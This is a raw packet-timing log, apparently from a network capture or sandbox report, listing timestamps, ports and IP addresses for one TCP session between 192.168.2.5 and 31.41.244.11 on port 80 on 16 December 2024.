Dec 16, 2024 11:03:18.063433886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.063527107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.063574076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.063805103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.064651966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.064764977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.064779997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.064827919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.065737963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.065839052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.065875053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.065886974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.066874981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.067019939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.067090988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.067091942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.068104029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.068166971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.199487925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.199543953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.199579000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.199660063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.199740887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.199873924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.199908018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.199927092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.200946093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.201042891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.201097965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.201178074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.202114105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.202167988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.202220917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.202220917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.203260899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.203337908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.203362942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.203430891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.204410076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.204464912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.204474926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.204591036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.205585957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.205653906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.205715895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.205912113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.206711054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.206803083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.206839085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.206901073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.207890034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.207998991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.208044052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.208044052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.209022045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.209115028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.209213018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.210175991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.210257053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.210298061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.210381031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.211332083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.211427927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.211509943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.211591005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.212522984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.212582111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.212590933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.212672949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.213630915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.213718891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.213802099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.214788914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.214890003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.214936018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.214936018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.215944052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.216064930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.216128111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.217252016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.217304945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.217463017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.218297958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.218334913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.218417883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.218461990 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.219577074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.219708920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.219791889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.220614910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.220706940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.220767021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.220839977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.221709967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.221802950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.221834898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.221903086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.222949028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.223057032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.223157883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.224061012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.224167109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.224179983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.224224091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.225136995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.225218058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.225286961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.225409031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.226331949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.226449013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.226588964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.227490902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.227595091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.227642059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.227739096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.228666067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.228831053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.228832960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.229804039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.229899883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.229933023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.230036974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.230976105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.231051922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.231072903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.231144905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.232157946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.232193947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.232244968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.232244968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.233269930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.233355045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.233387947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.233720064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.234443903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.234543085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.234560966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.234761000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.235600948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.235687971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.235888958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.236757994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.236826897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.236840963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.236924887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.237896919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.238058090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.238142967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.238500118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.239073992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.239182949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.239254951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.240170956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.240257978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.240308046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.240375042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.241378069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.241499901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.241504908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.241570950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.242542028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.242647886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.242697954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.242697954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.243707895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.243746996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.243804932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.243804932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.244865894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.244996071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.245098114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.246011019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.246103048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.246124029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.246200085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.247133970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.247246027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.247329950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.248334885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.248467922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.248477936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.248526096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.249447107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.249500990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.249553919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.249555111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.250674963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.250787973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.251018047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.251761913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.251885891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.251890898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.251941919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.252934933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.253047943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.253107071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.254126072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.254219055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.254220963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.254312992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.255238056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.255315065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.255373955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.255634069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.256428957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.256606102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.256618023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.256716013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.257539034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.257618904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.257668972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.257883072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.258752108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.258853912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.258922100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.260035038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.261015892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.392033100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.392124891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.392127037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.392251015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.392354965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.392446995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.392451048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.392607927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.393507004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.393583059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.393702984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.394608021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.394714117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.394727945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.394815922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.395792961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.395864010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.395874023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.395942926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.396903992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.397022009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.397072077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.397072077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.398118973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.398190975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.398272991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.398396015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.399266958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.399343014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.399396896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.399461031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.400396109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.400542021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.400556087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.400938988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.401535034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.401602983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.401670933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.401732922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.402678967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.402757883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.402786016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.403016090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.403844118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.403923035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.403989077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.404062986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.404994011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.405098915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.405154943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.405637980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.406146049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.406236887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.406280994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.406543970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.407339096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.407407999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.407490969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.407784939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.408461094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.408597946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.408601999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.408679962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.409625053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.409751892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.409806967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.409806967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.410774946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.410864115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.410903931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.410988092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.411945105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.412065029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.412107944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.412506104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.413090944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.413167953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.413227081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.413288116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.414243937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.414335966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.414380074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.414485931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.415402889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.415508986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.415550947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.415637970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.416560888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.416656971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.416698933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.416902065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.417725086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.417825937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.417834044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.417892933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.418883085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.419003963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.419059038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.420033932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.420164108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.420404911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.421171904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.421331882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.421370983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.421456099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.422327042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.422398090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.422480106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.422605991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.423474073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.423566103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.423633099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.423758030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.424654961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.424783945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.424792051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.424864054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.425797939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.425934076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.426004887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.426004887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.426951885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.427033901 CET	49800	80	192.168.2.5	31.41.244.11
